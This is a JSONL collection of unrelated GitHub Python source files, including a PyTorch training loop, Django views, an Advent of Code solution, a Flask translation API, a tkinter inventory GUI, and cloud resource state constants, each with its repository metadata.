np.array(val_data).tolist()\n\n\n # print(train_data[1][0], train_data[1][1])\n url = './data/img_crop/'\n train_loader = DataLoader(DataLoad(url, train_data), batch_size=args['Batch_size'], shuffle=True)\n val_loader = DataLoader(DataLoad(url, val_data), batch_size=args['Batch_size'])\n\n # build model\n model = ResidualNet('ImageNet', 50, 5, 'CBAM')\n model.to(device)\n criterion = nn.CrossEntropyLoss().to(device)\n # optimizer = torch.optim.SGD(model.parameters(), lr=0.1)\n optimizer = torch.optim.Adam(model.parameters(),)\n data = torch.Tensor(8, 3, 224,224)\n data = data.to(device)\n writer = SummaryWriter()\n writer.add_graph(model=model, input_to_model=data,verbose=True)\n writer.close()\n # summary(model, (3, 224, 224))\n\n #load the checkpoint\n if args['checkpoint']:\n if os.path.isfile(args['checkpoint']):\n print(\"===> loading checkpoint '{}'\".format(args['checkpoint']))\n checkpoint = torch.load(args['checkpoint'])\n args['start_epoch'] = checkpoint['epoch']\n best_prec1 = checkpoint['best_prec1']\n model.load_state_dict(checkpoint['state_dict'])\n if 'optimizer' in checkpoint:\n optimizer.load_state_dict(checkpoint['optimizer'])\n print(\"==> loaded checkpoint '{}' (epoch {})\"\n .format(args['checkpoint'], checkpoint['epoch']))\n else:\n print(\"==> no checkpoint found at '{}'\".format(args['checkpoint']))\n\n for _ in range(args['start_epoch'], args['epochs']):\n adjust_learning_rate(optimizer, _)\n\n train(train_loader, model, criterion, optimizer, _)\n\n prec1 = validate(val_loader, model, criterion, _)\n\n is_best = prec1 > best_prec1\n best_prec1 = max(prec1, best_prec1)\n save_checkpoint({\n 'epoch': _ + 1,\n 'arch': args['arch'],\n 'state_dict': model.state_dict(),\n 'best_prec1': best_prec1,\n 'optimizer': optimizer.state_dict(),\n }, is_best, args['prefix'])\n\n\nif __name__ == '__main__':\n main()","repo_name":"a281153685/MobileNet_SE_MO","sub_path":"train_test.py","file_name":"train_test.py","file_ext":"py","file_size_in_byte":8113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2001565541","text":"class Hayvan:\n ad = \"\"\n\n def adin_ne(self):\n print(\"Hayvanın adı bilinmiyor.\")\n\n def konus(self):\n adi = self.ad\n print(f\"{adi} konuşuyor.\")\n\n def oyna(self, arkadas):\n print(f\"{self.ad},{arkadas.ad} ile oynuyor\")\n\n def oyuncakla_oyna(self, oyuncak):\n print(f\"{self.ad}, {oyuncak} ile oynuyor.\")\n\n\nrodi = Hayvan()\nrodi.ad = \"Rodi\"\nmaya = Hayvan()\nmaya.ad = \"Maya\"\n\n# Hayvan.konus(rodi)\nrodi.konus()\nmaya.konus()\n\n\n# rodi.oyna = lambda arkadas: print(f\"Rodi, {arkadas.ad} ile oynuyor.\")\nrodi.oyna(maya) # Rodi, Maya ile oynuyor.\n\nmaya.oyna(rodi)\n\n\noyuncak = \"ayicik\"\n\nrodi.oyuncakla_oyna(oyuncak) # Rodi, top ile oynuyor.\nmaya.oyuncakla_oyna(oyuncak) # Maya, top ile oynuyor.\n\n# Hayvan.oyuncakla_oyna(rodi, oyuncak)\n","repo_name":"niturk/oyk_python_2023_nesne","sub_path":"3_nesne_hayvan.py","file_name":"3_nesne_hayvan.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18052913966","text":"from menu import Menu, MenuItem\nfrom coffee_maker import CoffeeMaker\nfrom money_machine import MoneyMachine\n\n# What would you like? (espresso/latte/cappuccino): espresso\n# Please insert coins.\n# how many quarters?: 20\n# how many dimes?: 3\n# how many nickles?: 3\n# how many pennies?: 3\n# Here is $4.0 in change.\n# What would you like? (espresso/latte/cappuccino): latte\n# Please insert coins.\n# how many quarters?: 28\n# how many dimes?: 83\n# how many nickles?: 28\n# how many pennies?: 378\n# Here is $18.0 in change.\n# What would you like? (espresso/latte/cappuccino): cappuccino\n# Sorry there is not enough water.\n# What would you like? (espresso/latte/cappuccino): report\n# Water: 50ml\n# Milk: 50ml\n# Coffee: 58ml\n# Money: $4.0\n# What would you like? (espresso/latte/cappuccino): test\n# ERROR~~~\n# What would you like? (espresso/latte/cappuccino):\n\nmenu = Menu()\ncoffee_maker = CoffeeMaker()\nmoney_machine = MoneyMachine()\nis_On = True\n\nwhile is_On:\n options = menu.get_items()\n choice = input(f\"What would you like? ({options}):\")\n if choice == \"off\":\n is_On = False\n elif choice == \"report\":\n coffee_maker.report()\n money_machine.report()\n else:\n drink = menu.find_drink(choice)\n if coffee_maker.is_resource_sufficient(drink) and money_machine.make_payment(drink.cost):\n coffee_maker.make_coffee(drink)\n","repo_name":"tranthanhbinh2603/100-days-of-code-python","sub_path":"Day 016/Project days 016.py","file_name":"Project days 016.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26499142744","text":"from django.conf import settings\nfrom django.core.mail import send_mail\nfrom django.shortcuts import render\n\nfrom jobs.models import Job,Employer,Location\nfrom likes.models import UserLike\nfrom matcho.models import Match,PositionMatch,EmployerMatch,LocationMatch\n\nfrom questions.forms import UserResponseForm\nfrom questions.models import Question\nfrom accounts.forms import SignupForm\nfrom accounts.models import User\n\n\n\n\ndef home(request):\n if request.user.is_authenticated:\n matches=Match.objects.get_matches_with_percent(request.user)[:6]\n positions=PositionMatch.objects.filter(user=request.user)[:6]\n if positions.count() > 0:\n positions[0].check_update(20)\n locations=LocationMatch.objects.filter(user=request.user)[:6]\n employers=EmployerMatch.objects.filter(user=request.user)[:5]\n mutual_likes= UserLike.objects.get_all_mutual_likes(request.user,4)\n new_user=False\n if len(mutual_likes) == 0 and len(matches)== 0:\n new_user=True\n\t\t# for match in matches:\n\t\t# \tjob_set=match[0].userjob_set.all()\n\t\t# \tif job_set.count() > 0:\n\t\t# \t\tfor job in job_set:\n\t\t# \t\t\tif job.position not in positions:\n\t\t# \t\t\t\tpositions.append(job.position)\n\t\t# \t\t\t\tthe_job=Job.objects.get(text__iexact=job.position)\n\t\t# \t\t\t\tjobmatch, created=PositionMatch.objects.get_or_create(user=request.user,job=the_job)\n\t\t# \t\t\t\ttry:\n\t\t# \t\t\t\t\tthe_job=Job.objects.get(text__iexact=job.position)\n\t\t# \t\t\t\t\tjobmatch, created=JobMatch.objects.get_or_create(user=request.user,job=the_job)\n\t\t# \t\t\t\texcept:\n\t\t# \t\t\t\t\tpass\n\t\t# \t\t\tif job.location not in locations:\n\t\t# \t\t\t\tlocations.append(job.location)\n\t\t# \t\t\t\ttry:\n\t\t# \t\t\t\t\tthe_loc=Location.objects.get(name__iexact=job.location)\n\t\t# \t\t\t\t\tlocmatch, created=LocationMatch.objects.get_or_create(user=request.user,location=the_loc)\n\t\t# \t\t\t\t\tprint(locmatch)\n\t\t# \t\t\t\texcept:\n\t\t# \t\t\t\t\tpass\n\t\t# \t\t\tif job.employer_name not in employers:\n\t\t# \t\t\t\temployers.append(job.employer_name)\n\t\t# \t\t\t\ttry:\n\t\t# \t\t\t\t\tthe_employer=Employer.objects.get(name__iexact=job.employer_name)\n\t\t# \t\t\t\t\tempymatch, created=EmployerMatch.objects.get_or_create(user=request.user,employer=the_employer)\n\t\t# \t\t\t\t\tprint(empymatch)\n\t\t# \t\t\t\texcept:\n\t\t# \t\t\t\t\tpass\n question_instance=None\n queryset = Question.objects.get_unanswered(request.user).order_by('-timestamp')\n if queryset.count()>0:\n question_instance= queryset.order_by(\"?\").first()\n question_form=UserResponseForm()\n context = {\n \"queryset\": queryset,\n \"matches\":matches,\n \"positions\":positions,\n \"locations\":locations,\n \"employers\":employers,\n \"mutual_likes\":mutual_likes,\n \"new_user\":new_user,\n \"question_form\":question_form,\n \"question_instance\":question_instance\n }\n return render(request, \"dashboard/home.html\", context)\n return render(request, \"accounts/signup.html\", {})\n","repo_name":"deftydev/Matchmaker","sub_path":"dashboard/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"15121142145","text":"#!python3\n\n\nINPUT = '792845136'\nTEST_INPUT = '389125467'\n\n\nclass Node(object):\n def __init__(self, label):\n self.label = label\n self.next = None\n\n\n def __repr__(self):\n next_label = self.next.label if self.next else '?'\n return f'Node({self.label}, next: {next_label})'\n\n\nclass CircularLinkedList(object):\n def __init__(self, current, size):\n self.current = current\n self.size = size\n\n\n def move(self):\n removed_start = self.current.next\n removed_end = removed_start.next.next\n # removed_end.next = None\n after_removed = removed_end.next\n self.current.next = after_removed\n\n destination = self._get_destination_cup(removed_start)\n after_destination = destination.next\n destination.next = removed_start\n removed_end.next = after_destination\n\n self.current = self.current.next\n\n\n def get_node_with_label(self, label):\n node = self.current\n while node.label != label:\n node = node.next\n return node\n\n\n def _get_destination_cup(self, removed_start):\n destination_label = self._get_destination_cup_label(removed_start)\n # print('destination label', destination_label)\n node = self.current\n while node.label != destination_label:\n node = node.next\n return node\n\n\n def _get_destination_cup_label(self, removed_start):\n removed_labels = [\n removed_start.label,\n removed_start.next.label,\n removed_start.next.next.label\n ]\n i = (self.current.label - 2) % self.size\n while (i + 1) in removed_labels:\n i = (i - 1) % self.size\n return i + 1\n\n\n @classmethod\n def make_with_labels(cls, labels):\n current = Node(labels[0])\n current_node = current\n for i in labels[1:]:\n next_node = Node(i)\n current_node.next = next_node\n current_node = next_node\n next_node.next = current\n return cls(current, len(labels))\n\n\n @classmethod\n def make_with_string_labels(cls, labels):\n labels = list(map(int, list(labels)))\n return cls.make_with_labels(labels)\n\n\n def __repr__(self):\n current_label = self.current.label\n labels = [current_label]\n next_node = self.current.next\n while next_node.label != current_label:\n labels.append(next_node.label)\n next_node = next_node.next\n return repr(labels)\n\n\ndef _part1(cll):\n '''Get the labels in order after label 1.'''\n n1 = cll.get_node_with_label(1)\n node = n1.next\n labels = []\n while node.label != 1:\n labels.append(node.label)\n node = node.next\n return ''.join(map(str, labels))\n\n\ndef test1():\n cll = CircularLinkedList.make_with_string_labels(TEST_INPUT)\n for _ in range(10):\n cll.move()\n x = _part1(cll)\n assert x == '92658374'\n\n\ndef test2():\n cll = CircularLinkedList.make_with_string_labels(TEST_INPUT)\n for _ in range(100):\n cll.move()\n x = _part1(cll)\n assert x == '67384529'\n\n\ndef part1():\n cll = CircularLinkedList.make_with_string_labels(INPUT)\n for _ in range(100):\n # print(f'-- move {i} --')\n # print(cll)\n cll.move()\n x = _part1(cll)\n return x\n\n\ndef part2():\n\n MAX = 50\n MOVES = 100\n\n start_labels = list(map(int, list(INPUT)))\n # print(start_labels)\n new_start = max(start_labels) + 1\n all_labels = start_labels + list(range(new_start, MAX + 1))\n # print('len all labels', len(all_labels))\n cll = CircularLinkedList.make_with_labels(all_labels)\n # print('cll.size', cll.size)\n # print('starting moves')\n for _ in range(MOVES):\n print(cll)\n cll.move()\n\n\ndef main():\n # test1()\n # test2()\n\n # p = part1()\n # print(p)\n\n p = part2()\n print(p)\n\n\nif __name__ == \"__main__\":\n main()\n # import timeit\n # x = timeit.timeit('main()', setup='from __main__ import main', number=1)\n # print(x)\n","repo_name":"PreludeAndFugue/AdventOfCode","sub_path":"2020/python/day23old1.py","file_name":"day23old1.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28509334016","text":"import pyLDAvis\nimport pyLDAvis.gensim_models as gensimvis\nfrom gensim.models.ldamodel import LdaModel\nfrom gensim.corpora.dictionary import Dictionary\n\n# Load your topic model data\ntopics_file = \"topics.txt\"\ntopics_per_document_file = \"topics_per_document.txt\"\n\n# Read topics data\nwith open(topics_file, \"r\") as f:\n topics_data = f.readlines()\n\n# Process topics data\ntopics = []\nfor line in topics_data:\n parts = line.strip().split(\": \")\n topic_words = parts[1].split(\" + \")\n topic_words = [word.split(\"*\")[1].strip('\"') for word in topic_words]\n topics.append(topic_words)\n\n# Create a dictionary\ndictionary = Dictionary(topics)\n\n# Create a corpus\ncorpus = [dictionary.doc2bow(topic) for topic in topics]\n\n# Create an LDA model\nlda_model = LdaModel(corpus, num_topics=len(topics), id2word=dictionary)\n\n# Read topics per document data\nwith open(topics_per_document_file, \"r\") as f:\n topics_per_document_data = f.readlines()\n\n# Process topics per document data\ndocuments = []\nfor line in topics_per_document_data:\n parts = line.strip().split(\": \")\n document_id = int(parts[0].split()[1])\n topic_probs = eval(parts[1])\n document_topics = [(topic[0], topic[1]) for topic in topic_probs]\n documents.append(document_topics)\n\n# Create pyLDAvis visualization\nvis_data = gensimvis.prepare(lda_model, corpus, dictionary)\n\n# Save or display the visualization\npyLDAvis.save_html(vis_data, \"lda_visualization.html\")\n","repo_name":"Leventsoft/india_topic_modelling","sub_path":"visualization-script.py","file_name":"visualization-script.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8569787026","text":"import prompt\nimport math\ndef ocean():\n prompt.bot_say(\"Тихий океан є найбільшим за площею серед всіх океанів. \\nВін займає більше половини всієї поверхні Землі, його площа становить більше 180 мільйонів квадратних кілометрів\")\n\ndef sahara():\n prompt.bot_say(\"Сахара - це найбільша пустеля в світі, яка розташована в Північній Африці. \\nВона простирається через 11 країн, включаючи Алжир, Чад, Єгипет, Лівію, Малі, Мавританію, Марокко, Нігер, Західну Сахару, Судан і Туніс\")\n\ndef find_dot():\n prompt.bot_say(\"Бот: Введіть координату Х першої точки\")\n (command, coordinate_x) = prompt.handle_input_as_float()\n if command == prompt.Command.BACK:\n return\n if command == prompt.Command.EXIT:\n prompt.bot_say(\"Бувайте!\")\n exit(0)\n prompt.bot_say(\"Введіть координату Y першої точки\")\n (command, coordinate_y) = prompt.handle_input_as_float()\n if command == prompt.Command.BACK:\n return\n if command == prompt.Command.EXIT:\n prompt.bot_say(\"Бувайте!\")\n exit(0)\n prompt.bot_say(\"Введіть чому дорівнює відстань між точками\")\n (command, distance_dots) = prompt.handle_input_as_float()\n if command == prompt.Command.BACK:\n return\n if command == prompt.Command.EXIT:\n prompt.bot_say(\"Бувайте!\")\n exit(0)\n prompt.bot_say(\"Введіть чому дорівнює азимут від першої точки до другої\")\n (command, azimuth) = prompt.handle_input_as_float()\n if command == prompt.Command.BACK:\n return\n if command == prompt.Command.EXIT:\n prompt.bot_say(\"Бувайте!\")\n exit(0)\n azimuth_radians = math.radians(azimuth)\n unknown_x = coordinate_x + distance_dots * math.cos(azimuth_radians)\n unknown_y = coordinate_y + distance_dots * math.sin(azimuth_radians)\n prompt.bot_say(\"{unknown_x}, {unknown_y}\")\ndef distance_dots():\n prompt.bot_say(\"Введіть координату Х першої точки\")\n (command, first_coordinate_x) = prompt.handle_input_as_float()\n if command == prompt.Command.BACK:\n return\n if command == prompt.Command.EXIT:\n prompt.bot_say(\"Бувайте!\")\n exit(0)\n prompt.bot_say(\"Введіть координату Y першої точки\")\n (command, first_coordinate_y) = prompt.handle_input_as_float()\n if command == prompt.Command.BACK:\n return\n if command == prompt.Command.EXIT:\n prompt.bot_say(\"Бувайте!\")\n exit(0)\n prompt.bot_say(\"Введіть координату X другої точки\")\n (command, second_coordinate_x) = prompt.handle_input_as_float()\n if command == prompt.Command.BACK:\n return\n if command == prompt.Command.EXIT:\n prompt.bot_say(\"Бувайте!\")\n exit(0)\n prompt.bot_say(\"Введіть координату Y другої точки\")\n (command, second_coordinate_y) = prompt.handle_input_as_float()\n if command == prompt.Command.BACK:\n return\n if command == prompt.Command.EXIT:\n prompt.bot_say(\"Бувайте!\")\n exit(0)\n distance = math.sqrt((second_coordinate_x - first_coordinate_x) ** 2 + (second_coordinate_y - first_coordinate_y) ** 2)\n prompt.bot_say(\"Відстань між двома точками: {distance}\")\n\ndef climates():\n prompt.bot_say(\"Головні типи клімату: \\nТропічний \\nСубтропічний \\nЕкваторіальний \\nСередземноморський \\nМусонний \\nПрибережний \\nКонтинентальний \\nАрктичний \\nАнтарктичний\")\n\ndef ekvator():\n prompt.bot_say(\"Екватор — уявне коло, проведене на поверхні планети на рівній відстані від обох географічних полюсів\")","repo_name":"zavgorodnyakateryna/chat-bot","sub_path":"geography_function.py","file_name":"geography_function.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71392814226","text":"from waitress import serve\nfrom core.translate import Translate\nfrom utils.constants import FLASK_DEBUG, HOST, PORT\nfrom flask import Flask, request, make_response\n\napp = Flask(__name__)\n\n\ntranslate = Translate(True)\n\n\n@app.route('/translate', methods=['POST'])\ndef translate_handler():\n request_body = request.json\n if request_body is None:\n return make_response(\"Request body is None\", 400)\n result = translate.translate(\n text=request_body['q'], from_code=request_body['source'], to_code=request_body['target'])\n return make_response({\"translatedText\": result}, 201)\n\n\n@app.route('/languages', methods=['GET'])\ndef get_languages():\n langs = []\n for lang in translate.get_languages():\n langs.append({\"name\": lang.name, \"code\": lang.code})\n return make_response(langs, 200)\n\n\n@app.route('/check', methods=['GET'])\ndef check():\n return 'success'\n\n\nif FLASK_DEBUG:\n app.run(host=HOST, port=PORT)\nelse:\n serve(app, host=HOST, port=PORT)\n","repo_name":"kolserdav/ana","sub_path":"packages/translate2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"48"} +{"seq_id":"8388034480","text":"from django.conf.urls import url\n\nfrom settings.views import home, paginations, remove_category, download, format_date\n\nbase64_pattern=r'(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?'\n\nurlpatterns=[\n\n url(r'^home/$', home, name=\"setting_home\"),\n url(r'^pagination/((?P[\\d]+))/$', paginations, name=\"setting_pagination\"),\n url(r'^category/remove/' + '(?P{})/$'.format(base64_pattern), remove_category,\n name=\"setting_category_remove\"),\n\n url(r'^download/' + '(?P{})/$'.format(base64_pattern), download,\n name=\"setting_download\"),\n url(r'^format/' + '(?P{})/$'.format(base64_pattern), format_date,\n name=\"setting_format\"),\n\n]\n","repo_name":"rubythonode/pinmyblogs","sub_path":"settings/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8265028850","text":"import tkinter\nimport random\nfrom tkinter import *\nfrom tkinter import ttk\n\n\nroot = tkinter.Tk()\nroot.overrideredirect(True)\nvyska=root.winfo_screenheight()\nsirka=root.winfo_screenwidth()\nroot.geometry(\"{0}x{1}+0+0\".format(sirka, vyska))\nroot.config(bg='white')\nstart = 0\n\nhlavna_tema=\"Interná databáza \"\nhlavna_tema2=\"tovaru\"\n\nw = tkinter.Label(root, text=hlavna_tema,justify=tkinter.LEFT,font= ('Roboto',35)).place(x=sirka/25.6,y=vyska/15.428)\nw = tkinter.Label(root, text=hlavna_tema2,justify=tkinter.LEFT,font= ('Roboto',35)).place(x=sirka/9.6,y=vyska/8)\nwecka=tkinter.Label(root)\nwecka.place(x=-10,y=-10)\n##c = Canvas(root)\n##c.pack()\n\n\n##create.rectangle( 100, 100, 200, 200,root)\n##canvas.create_rectangle(275, 165, 525, 215, fill=\"#C2B6BF\")\ncanvas=tkinter.Canvas(bg='lightgrey',width=sirka-sirka/3.2,height=vyska)\ncanvas.place(x=sirka/3.2,y=0)\n\n\n\n\n\n\n\nprint(vyska)\nprint(sirka)\n\n\n##logo = tk.PhotoImage(file=\"python_logo_small.gif\")\n##\n##w1 = tk.Label(root, image=logo).pack(side=\"right\")\n##\n##explanation = \"\"\"At present, only GIF and PPM/PGM\n##formats are supported, but an interface \n##exists to allow additional image file\n##formats to be added easily.\"\"\"\n##--------------------------------Buttony--------------------------\n\n\nw1=0\n\n\ndef zelenina():\n global start,w1,w2,w3,w4,w5,w6,w7,w8,wecka\n if start==0:\n start=1\n m=canvas.create_rectangle(sirka/15,vyska/3.15,sirka/1.745,vyska/1.25,fill='beige',outline='beige')\n wecka.place_forget()\n w1 = tkinter.Label(root, text='Zelenina',font= ('Roboto',30))\n w1.place(x=sirka/2.56,y=vyska/4.32)\n wecka=w1\n \n \n\n else:start=0\n \ndef ovocie():\n global start,w1,w2,w3,w4,w5,w6,w7,w8,wecka\n if start==0:\n start=1\n \n wecka.place_forget()\n w2=tkinter.Label(root, text='Ovocie',font= ('Roboto',30))\n w2.place(x=sirka/2.56,y=vyska/4.32)\n wecka=w2\n \n\n else: start=0\n\ndef pecivo():\n global start,w1,w2,w3,w4,w5,w6,w7,w8,wecka\n if start==0:\n start=1\n wecka.place_forget()\n w3=tkinter.Label(root, text='Pečivo',font= ('Roboto',30))\n w3.place(x=sirka/2.56,y=vyska/4.32)\n wecka=w3\n else: start=0\n\ndef maso():\n global start,w1,w2,w3,w4,w5,w6,w7,w8,wecka\n if start==0:\n start=1\n wecka.place_forget()\n w4=tkinter.Label(root, text='Mäso',font= ('Roboto',30))\n w4.place(x=sirka/2.56,y=vyska/4.32)\n wecka=w4\n else: start=0\n\ndef mliecne_vyrobky():\n global start,w1,w2,w3,w4,w5,w6,w7,w8,wecka\n if start==0:\n start=1\n wecka.place_forget()\n w5=tkinter.Label(root, text='Mliečne výrobky',font= ('Roboto',30))\n w5.place(x=sirka/2.56,y=vyska/4.32)\n wecka=w5\n else: start=0\n\ndef napoje():\n global start,w1,w2,w3,w4,w5,w6,w7,w8,wecka\n if start==0:\n start=1\n wecka.place_forget()\n w6=tkinter.Label(root, text='Nápoje',font= ('Roboto',30))\n w6.place(x=sirka/2.56,y=vyska/4.32)\n wecka=w6\n else: start=0\n\ndef sladkosti_slanosti():\n global start,w1,w2,w3,w4,w5,w6,w7,w8,wecka\n if start==0:\n start=1\n wecka.place_forget()\n w7=tkinter.Label(root, text='Sladkosti/Slanosti',font= ('Roboto',30))\n w7.place(x=sirka/2.56,y=vyska/4.32)\n wecka=w7\n else: start=0\n\ndef ostatne():\n global start,w1,w2,w3,w4,w5,w6,w7,w8,wecka\n if start==0:\n start=1\n wecka.place_forget()\n w8=tkinter.Label(root, text='Ostatné',font= ('Roboto',30))\n w8.place(x=sirka/2.56,y=vyska/4.32)\n wecka=w8\n else: start=0\n\n##----------------------------------------------------------------------------\nname = tkinter.StringVar()\nnameEntered = ttk.Entry(root, font=(\"Roboto\", int(vyska/54)), textvariable = name)\nnameEntered.place(relx=sirka/2193.5, rely=vyska/1245.81,width=sirka/4.267,height=vyska/15.43, anchor='n')\n\nlabel = ttk.Label(root, text = \"Vlož názov a kód tovaru\", font=(\"Roboto\", int(vyska/75)))\nlabel.place(x=sirka/1.5311,y=vyska/1.206)\n##label.grid(column = 0, row = 0)\n\n\n\ndef clickMe():\n label.configure(text= 'NAZOV A KOD TOVARU ' + name.get())\n\n\n\n\n##-----------------------------------------------------------------------------------\ndef menu():\n global start\n if start==0:\n start=1\n menu = Toplevel(root)\n menu.title(\"New Window\")\n menu.geometry('200x200')\n Label(menu,text =\"This is a new window\").pack()\n else: start=0\n\nbuttonstart1=tkinter.Button(text=\"Zelenina\", width=int(sirka/90) ,font=\"Bahnschrift 20\", bg=\"#98C352\", fg=\"white\", activebackground=\"#E0DA63\", activeforeground=\"black\",\n borderwidth=3,cursor=\"hand2\",command=zelenina).place(x=sirka-sirka/1.05, y=vyska-vyska/1.3)\n\nbuttonstart1=tkinter.Button(text=\"Ovocie\", width=int(sirka/90),font=\"Bahnschrift 20\", bg=\"#98C352\", fg=\"white\", activebackground=\"#E0DA63\", activeforeground=\"black\",\n borderwidth=3,cursor=\"hand2\",command=ovocie).place(x=sirka-sirka/1.05, y=vyska-vyska/1.46)\n\nbuttonstart1=tkinter.Button(text=\"Pečivo\", width=int(sirka/90),font=\"Bahnschrift 20\", bg=\"#98C352\", fg=\"white\", activebackground=\"#E0DA63\", activeforeground=\"black\",\n borderwidth=3,cursor=\"hand2\",command=pecivo).place(x=sirka-sirka/1.05, y=vyska-vyska/1.665)\n\nbuttonstart1=tkinter.Button(text=\"Mäso\", width=int(sirka/90),font=\"Bahnschrift 20\", bg=\"#98C352\", fg=\"white\", activebackground=\"#E0DA63\", activeforeground=\"black\",\n borderwidth=3,cursor=\"hand2\",command=maso).place(x=sirka-sirka/1.05, y=vyska-vyska/1.94)\n\nbuttonstart1=tkinter.Button(text=\"Mliečne výrobky\", width=int(sirka/90),font=\"Bahnschrift 20\", bg=\"#98C352\", fg=\"white\", activebackground=\"#E0DA63\", activeforeground=\"black\",\n borderwidth=3,cursor=\"hand2\",command=mliecne_vyrobky).place(x=sirka-sirka/1.05, y=vyska-vyska/2.327)\n\nbuttonstart1=tkinter.Button(text=\"Nápoje\", width=int(sirka/90),font=\"Bahnschrift 20\", bg=\"#98C352\", fg=\"white\", activebackground=\"#E0DA63\", activeforeground=\"black\",\n borderwidth=3,cursor=\"hand2\",command=napoje).place(x=sirka-sirka/1.05, y=vyska-vyska/2.9)\n\nbuttonstart1=tkinter.Button(text=\"Sladkosti/Slanosti\", width=int(sirka/90),font=\"Bahnschrift 20\", bg=\"#98C352\", fg=\"white\", activebackground=\"#E0DA63\", activeforeground=\"black\",\n borderwidth=3,cursor=\"hand2\",command=sladkosti_slanosti).place(x=sirka-sirka/1.05, y=vyska-vyska/3.86)\n\nbuttonstart1=tkinter.Button(text=\"Ostatné\", width=int(sirka/90),font=\"Bahnschrift 20\", bg=\"#98C352\", fg=\"white\", activebackground=\"#E0DA63\", activeforeground=\"black\",\n borderwidth=3,cursor=\"hand2\",command=ostatne).place(x=sirka-sirka/1.05, y=vyska-vyska/5.7)\n\n\n\nbuttonstart1=tkinter.Button(text=\"Pridat\", width=int(sirka/290),height=int(vyska/400),font=\"Bahnschrift 20\", bg=\"#98C352\", fg=\"white\", activebackground=\"#E0DA63\", activeforeground=\"black\",\n borderwidth=3,cursor=\"hand2\",command=clickMe).place(x=sirka/1.12, y=vyska-vyska/5.7)\n","repo_name":"matuskolejak/interna-datbaza","sub_path":"modul_interna_databaza_Matus_Kolejak.py","file_name":"modul_interna_databaza_Matus_Kolejak.py","file_ext":"py","file_size_in_byte":7119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6904690475","text":"\"\"\"\nConstants for the different states in the CloudCIX system\n\"\"\"\n\nIN_API = -1\nIGNORE = 0\nREQUESTED = 1\nBUILDING = 2\nUNRESOURCED = 3\nRUNNING = 4\nQUIESCE = 5\nQUIESCED = 6\nRESTART = 7\nSCRUB = 8\nSCRUB_QUEUE = 9\nRUNNING_UPDATE = 10\nRUNNING_UPDATING = 11\nQUIESCING = 12\nRESTARTING = 13\nSCRUB_PREP = 14\nQUIESCED_UPDATE = 15\nQUIESCED_UPDATING = 16\nSCRUBBING = 17\nCLOSED = 99\n\nVALID_RANGE = [*range(IGNORE, SCRUBBING + 1), CLOSED]\n\nROBOT_STATE_MAP = {\n REQUESTED: {BUILDING, UNRESOURCED},\n BUILDING: {UNRESOURCED, RUNNING},\n UNRESOURCED: {REQUESTED, QUIESCE, RESTART, SCRUB, RUNNING_UPDATE, QUIESCED_UPDATE},\n QUIESCE: {QUIESCING},\n RESTART: {RESTARTING},\n SCRUB: {SCRUB_PREP, SCRUBBING},\n RUNNING_UPDATE: {RUNNING_UPDATING},\n RUNNING_UPDATING: {UNRESOURCED, RUNNING},\n QUIESCED_UPDATE: {QUIESCED_UPDATING},\n QUIESCED_UPDATING: {UNRESOURCED, QUIESCED},\n QUIESCING: {UNRESOURCED, QUIESCED},\n RESTARTING: {UNRESOURCED, RUNNING},\n SCRUB_PREP: {UNRESOURCED, SCRUB_QUEUE},\n SCRUB_QUEUE: {SCRUBBING},\n SCRUBBING: {UNRESOURCED, CLOSED},\n}\n\nUSER_STATE_MAP = {\n RUNNING: {QUIESCE, SCRUB, RUNNING_UPDATE},\n QUIESCED: {RESTART, SCRUB, QUIESCED_UPDATE},\n SCRUB_QUEUE: {RESTART},\n}\n\nUSER_SNAPSHOT_STATE_MAP = {\n RUNNING: {RUNNING_UPDATE, SCRUB},\n}\n\nUSER_BACKUP_STATE_MAP = {\n RUNNING: {RUNNING_UPDATE, SCRUB},\n}\n\n# List of stable states a VM can be restored to when a Project is restored\nVM_RESTORE_STATES = [\n RUNNING,\n QUIESCED,\n]\n\n# Map showing what states to restore a VM to from the last stable state the VM was in when a Project is restored\nVM_RESTORE_MAP = {\n RUNNING: RESTART,\n QUIESCED: QUIESCED,\n}\n\nROBOT_PROCESS_STATES = {\n REQUESTED,\n QUIESCE,\n RUNNING_UPDATE,\n QUIESCED_UPDATE,\n RESTART,\n SCRUB,\n}\n\n# Stable States\nSTABLE_STATES = [\n RUNNING,\n QUIESCED,\n SCRUB_QUEUE,\n CLOSED,\n]\n\n# BOM Create States - Set of states for which we should create new BOM entries\nBOM_CREATE_STATES = {\n REQUESTED,\n RUNNING_UPDATE,\n QUIESCED_UPDATE,\n SCRUB,\n # Billing should resume if a VM is requested to restore from the SCRUB_QUEUE\n RESTART,\n QUIESCED,\n}\n\n# Billing Ignore States - set of states where we should set SKUs to 0\n# Must be a subset of BOM_CREATE_STATES to work properly\nBILLING_IGNORE_STATES = {\n SCRUB,\n}\n\n# States customer can request that may require and email to be sent by robot\nSEND_EMAIL_STATES = [\n REQUESTED,\n QUIESCE,\n RESTART,\n SCRUB,\n RUNNING_UPDATE,\n QUIESCED_UPDATE,\n]\n","repo_name":"CloudCIX/iaas","sub_path":"state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} 